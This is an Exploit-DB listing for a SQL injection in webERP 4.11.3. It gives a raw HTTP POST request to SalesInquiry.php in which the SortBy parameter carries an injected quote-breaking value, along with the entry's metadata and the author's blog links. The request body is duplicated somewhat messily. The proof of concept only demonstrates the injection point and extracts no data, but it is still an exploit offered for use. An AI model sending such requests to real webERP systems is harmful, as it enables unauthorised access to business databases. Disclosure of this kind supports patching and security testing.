EXPLOITS

webERP 4.11.3 - 'SalesInquiry.php?SortBy' SQL Injection

Author: HauntIT
type: webapps
platform: php
port: 80.0
date_added: 2014-02-28  
date_updated: 2014-03-05  
verified: 1  
codes: OSVDB-103891  
tags:   
aliases:   
screenshot_url: http://www.exploit-db.com/screenshots/idlt32000/screen-shot-2014-03-05-at-145559.png  
application_url: http://www.exploit-db.comwebERP_4.11.3.zip  

raw file: 31989.txt  

# ==============================================================
# Title ...| SQL Injection in webERP
# Version .| 4.11.3
# Date ....| 28.02.2014
# Found ...| HauntIT Blog
# Home ....| http://www.weberp.org
# ==============================================================


# ==============================================================
# SQL Injection

---<request>---
POST /k/cms/erp/webERP/SalesInquiry.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 391

FormID=09607700a0e7ff0699503963022b5ae0944cd0bc&ReportType=Detail&OrderType=0&DateType=Order&InvoiceType=All&FromDate=01%2F02%2F2014&ToDate=28%2F02%2F2014&PartNumberOp=Equals&PartNumber=&DebtorNoOp=Equals&DebtorNo=&DebtorNameOp=LIKE&DebtorName=&OrderNo=&LineStatus=All&Category=All&Salesman=All&Area=All&SortBy= FormID=09607700a0e7ff0699503963022b5ae0944cd0bc&ReportType=Detail&OrderType=0&DateType=Order&InvoiceType=All&FromDate=01/02/2014&ToDate=28/02/2014&PartNumberOp=Equals&PartNumber=&DebtorNoOp=Equals&DebtorNo=&DebtorNameOp=LIKE&DebtorName=&OrderNo=&LineStatus=All&Category=All&Salesman=All&Area=All&SortBy='TADAAAM;]&SummaryType=orderno&submit=Run Inquiry&SummaryType=orderno&submit=Run+Inquiry
---<request>---


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/